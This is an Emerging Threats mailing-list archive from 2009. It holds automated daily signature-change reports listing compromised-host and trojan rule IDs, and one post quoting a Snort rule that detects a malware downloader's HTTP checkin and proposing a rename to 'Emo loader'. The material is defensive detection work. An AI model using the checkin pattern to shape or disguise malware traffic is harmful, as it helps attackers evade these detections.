        2500152 || ET COMPROMISED Known Compromised or Hostile Host Traffic (153) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510139 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510140 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510141 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510142 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (143) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510143 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (144) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510144 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (145) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510145 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (146) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510146 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (147) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510147 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (148) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510148 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (149) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510149 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (150) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510150 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (151) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510151 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (152) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510152 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (153) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Added to emerging-virus.rules (1):
        #disabling for now. this same payload seems to be used by a number of ping libraries

[---]     Removed non-rule lines:    [---]

     -> Removed from emerging-sid-msg.map (2):
        2003642 || ET TROJAN Downloader.Affill User Agent Detected (lol) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,doc.emergingthreats.net/2003642
        2009349 || ET TROJAN Bzub/Cimuz/Tanspy Reporting User Activity || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bzub || url,doc.emergingthreats.net/2009349

     -> Removed from emerging-sid-msg.map.txt (2):
        2003642 || ET TROJAN Downloader.Affill User Agent Detected (lol) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,doc.emergingthreats.net/2003642
        2009349 || ET TROJAN Bzub/Cimuz/Tanspy Reporting User Activity || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bzub || url,doc.emergingthreats.net/2009349


From phatbuckett at gmail.com  Fri May 15 21:15:26 2009
From: phatbuckett at gmail.com (Darren Spruell)
Date: Fri, 15 May 2009 18:15:26 -0700
Subject: [Emerging-Sigs] 2008546 = emo loader
Message-ID: <839aec700905151815v243086c4oc2ec520cac48b360@mail.gmail.com>

Existing rule:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
Downloader.vr Checkin part 1 of 2"; flow:established,to_server;
content:"GET "; depth:4; uricontent:".php"; uricontent:"v=";
uricontent:"&rs="; uricontent:"&n="; uricontent:"&uid=";
classtype:trojan-activity;
reference:url,doc.emergingthreats.net/2008546;
reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General;
sid:2008546; rev:3;)

This is commonly known as Emo loader (e.g.
http://www.malwaredomainlist.com/mdl.php?search=emo+&colsearch=All&quantity=50),
if a rule message update is OK.

Also, by the message text, is there supposed to be an accompanying
part 2 of 2 anywhere?

-- 
Darren Spruell
phatbuckett at gmail.com

From emerging at emergingthreats.net  Sat May 16 16:00:11 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Sat, 16 May 2009 16:00:11 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090516200011.557134504B@goliath.jonkmans.com>


[***] Results from Oinkmaster started Sat May 16 16:00:11 2009 [***]

[///]     Modified active rules:     [///]

 2009351 - ET TROJAN Urlzone/Bebloh Communication with Controller (emerging-virus.rules)


[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-sid-msg.map (1):
        2009351 || ET TROJAN Urlzone/Bebloh Communication with Controller || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bebloh || url,doc.emergingthreats.net/2009351 || url,threatinfo.trendmicro.com/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY_BEBLOH.KO&VSect=Td

     -> Added to emerging-sid-msg.map.txt (1):
        2009351 || ET TROJAN Urlzone/Bebloh Communication with Controller || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bebloh || url,doc.emergingthreats.net/2009351 || url,threatinfo.trendmicro.com/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY_BEBLOH.KO&VSect=Td

[---]     Removed non-rule lines:    [---]

     -> Removed from emerging-sid-msg.map (145):
        2009351 || ET TROJAN Urlzone/Bebloh Communication with Controller || url,threatinfo.trendmicro.com/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY_BEBLOH.KO&VSect=Td
        2500081 || ET COMPROMISED Known Compromised or Hostile Host Traffic (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500082 || ET COMPROMISED Known Compromised or Hostile Host Traffic (83) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500083 || ET COMPROMISED Known Compromised or Hostile Host Traffic (84) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500084 || ET COMPROMISED Known Compromised or Hostile Host Traffic (85) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500085 || ET COMPROMISED Known Compromised or Hostile Host Traffic (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500086 || ET COMPROMISED Known Compromised or Hostile Host Traffic (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500087 || ET COMPROMISED Known Compromised or Hostile Host Traffic (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500088 || ET COMPROMISED Known Compromised or Hostile Host Traffic (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500089 || ET COMPROMISED Known Compromised or Hostile Host Traffic (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500090 || ET COMPROMISED Known Compromised or Hostile Host Traffic (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500091 || ET COMPROMISED Known Compromised or Hostile Host Traffic (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500092 || ET COMPROMISED Known Compromised or Hostile Host Traffic (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500093 || ET COMPROMISED Known Compromised or Hostile Host Traffic (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500094 || ET COMPROMISED Known Compromised or Hostile Host Traffic (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500095 || ET COMPROMISED Known Compromised or Hostile Host Traffic (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500096 || ET COMPROMISED Known Compromised or Hostile Host Traffic (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500097 || ET COMPROMISED Known Compromised or Hostile Host Traffic (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500098 || ET COMPROMISED Known Compromised or Hostile Host Traffic (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500099 || ET COMPROMISED Known Compromised or Hostile Host Traffic (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500100 || ET COMPROMISED Known Compromised or Hostile Host Traffic (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500101 || ET COMPROMISED Known Compromised or Hostile Host Traffic (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500102 || ET COMPROMISED Known Compromised or Hostile Host Traffic (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500103 || ET COMPROMISED Known Compromised or Hostile Host Traffic (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500104 || ET COMPROMISED Known Compromised or Hostile Host Traffic (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500105 || ET COMPROMISED Known Compromised or Hostile Host Traffic (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500106 || ET COMPROMISED Known Compromised or Hostile Host Traffic (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500107 || ET COMPROMISED Known Compromised or Hostile Host Traffic (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500108 || ET COMPROMISED Known Compromised or Hostile Host Traffic (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500109 || ET COMPROMISED Known Compromised or Hostile Host Traffic (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500110 || ET COMPROMISED Known Compromised or Hostile Host Traffic (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500111 || ET COMPROMISED Known Compromised or Hostile Host Traffic (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500112 || ET COMPROMISED Known Compromised or Hostile Host Traffic (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500113 || ET COMPROMISED Known Compromised or Hostile Host Traffic (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500114 || ET COMPROMISED Known Compromised or Hostile Host Traffic (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500115 || ET COMPROMISED Known Compromised or Hostile Host Traffic (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500116 || ET COMPROMISED Known Compromised or Hostile Host Traffic (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500117 || ET COMPROMISED Known Compromised or Hostile Host Traffic (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500118 || ET COMPROMISED Known Compromised or Hostile Host Traffic (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500119 || ET COMPROMISED Known Compromised or Hostile Host Traffic (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500120 || ET COMPROMISED Known Compromised or Hostile Host Traffic (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500121 || ET COMPROMISED Known Compromised or Hostile Host Traffic (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500122 || ET COMPROMISED Known Compromised or Hostile Host Traffic (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500123 || ET COMPROMISED Known Compromised or Hostile Host Traffic (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500124 || ET COMPROMISED Known Compromised or Hostile Host Traffic (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500125 || ET COMPROMISED Known Compromised or Hostile Host Traffic (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500126 || ET COMPROMISED Known Compromised or Hostile Host Traffic (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500127 || ET COMPROMISED Known Compromised or Hostile Host Traffic (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500128 || ET COMPROMISED Known Compromised or Hostile Host Traffic (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500129 || ET COMPROMISED Known Compromised or Hostile Host Traffic (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500130 || ET COMPROMISED Known Compromised or Hostile Host Traffic (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500131 || ET COMPROMISED Known Compromised or Hostile Host Traffic (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500132 || ET COMPROMISED Known Compromised or Hostile Host Traffic (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500133 || ET COMPROMISED Known Compromised or Hostile Host Traffic (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500134 || ET COMPROMISED Known Compromised or Hostile Host Traffic (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500135 || ET COMPROMISED Known Compromised or Hostile Host Traffic (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500136 || ET COMPROMISED Known Compromised or Hostile Host Traffic (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500137 || ET COMPROMISED Known Compromised or Hostile Host Traffic (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500138 || ET COMPROMISED Known Compromised or Hostile Host Traffic (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500139 || ET COMPROMISED Known Compromised or Hostile Host Traffic (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500140 || ET COMPROMISED Known Compromised or Hostile Host Traffic (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500141 || ET COMPROMISED Known Compromised or Hostile Host Traffic (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500142 || ET COMPROMISED Known Compromised or Hostile Host Traffic (143) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500143 || ET COMPROMISED Known Compromised or Hostile Host Traffic (144) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500144 || ET COMPROMISED Known Compromised or Hostile Host Traffic (145) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500145 || ET COMPROMISED Known Compromised or Hostile Host Traffic (146) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500146 || ET COMPROMISED Known Compromised or Hostile Host Traffic (147) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500147 || ET COMPROMISED Known Compromised or Hostile Host Traffic (148) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500148 || ET COMPROMISED Known Compromised or Hostile Host Traffic (149) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500149 || ET COMPROMISED Known Compromised or Hostile Host Traffic (150) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500150 || ET COMPROMISED Known Compromised or Hostile Host Traffic (151) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500151 || ET COMPROMISED Known Compromised or Hostile Host Traffic (152) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500152 || ET COMPROMISED Known Compromised or Hostile Host Traffic (153) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510081 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510082 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (83) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510083 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (84) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510084 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (85) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510085 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510086 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510087 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510088 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510089 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510090 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510091 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510092 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510093 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510094 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510095 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510096 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510097 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510098 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510099 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510100 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510101 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510102 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510103 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510104 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510105 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510106 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510107 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510108 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510109 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510110 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510111 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510112 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510113 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510114 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510115 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510116 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510117 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510118 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510119 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510120 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510121 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510122 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510123 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510124 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510125 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510126 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510127 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510128 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510129 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510130 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510131 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510132 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510133 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510134 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510135 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510136 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510137 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510138 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510139 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510140 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510141 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510142 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (143) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510143 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (144) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510144 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (145) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510145 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (146) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510146 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (147) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510147 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (148) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510148 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (149) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510149 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (150) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510150 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (151) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510151 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (152) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510152 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (153) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Removed from emerging-sid-msg.map.txt (145):
        2009351 || ET TROJAN Urlzone/Bebloh Communication with Controller || url,threatinfo.trendmicro.com/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY_BEBLOH.KO&VSect=Td
        2500081 || ET COMPROMISED Known Compromised or Hostile Host Traffic (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500082 || ET COMPROMISED Known Compromised or Hostile Host Traffic (83) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500083 || ET COMPROMISED Known Compromised or Hostile Host Traffic (84) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500084 || ET COMPROMISED Known Compromised or Hostile Host Traffic (85) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500085 || ET COMPROMISED Known Compromised or Hostile Host Traffic (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500086 || ET COMPROMISED Known Compromised or Hostile Host Traffic (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500087 || ET COMPROMISED Known Compromised or Hostile Host Traffic (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500088 || ET COMPROMISED Known Compromised or Hostile Host Traffic (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500089 || ET COMPROMISED Known Compromised or Hostile Host Traffic (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500090 || ET COMPROMISED Known Compromised or Hostile Host Traffic (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500091 || ET COMPROMISED Known Compromised or Hostile Host Traffic (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500092 || ET COMPROMISED Known Compromised or Hostile Host Traffic (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500093 || ET COMPROMISED Known Compromised or Hostile Host Traffic (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500094 || ET COMPROMISED Known Compromised or Hostile Host Traffic (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500095 || ET COMPROMISED Known Compromised or Hostile Host Traffic (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500096 || ET COMPROMISED Known Compromised or Hostile Host Traffic (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500097 || ET COMPROMISED Known Compromised or Hostile Host Traffic (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500098 || ET COMPROMISED Known Compromised or Hostile Host Traffic (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500099 || ET COMPROMISED Known Compromised or Hostile Host Traffic (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500100 || ET COMPROMISED Known Compromised or Hostile Host Traffic (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500101 || ET COMPROMISED Known Compromised or Hostile Host Traffic (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500102 || ET COMPROMISED Known Compromised or Hostile Host Traffic (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500103 || ET COMPROMISED Known Compromised or Hostile Host Traffic (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500104 || ET COMPROMISED Known Compromised or Hostile Host Traffic (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500105 || ET COMPROMISED Known Compromised or Hostile Host Traffic (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500106 || ET COMPROMISED Known Compromised or Hostile Host Traffic (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
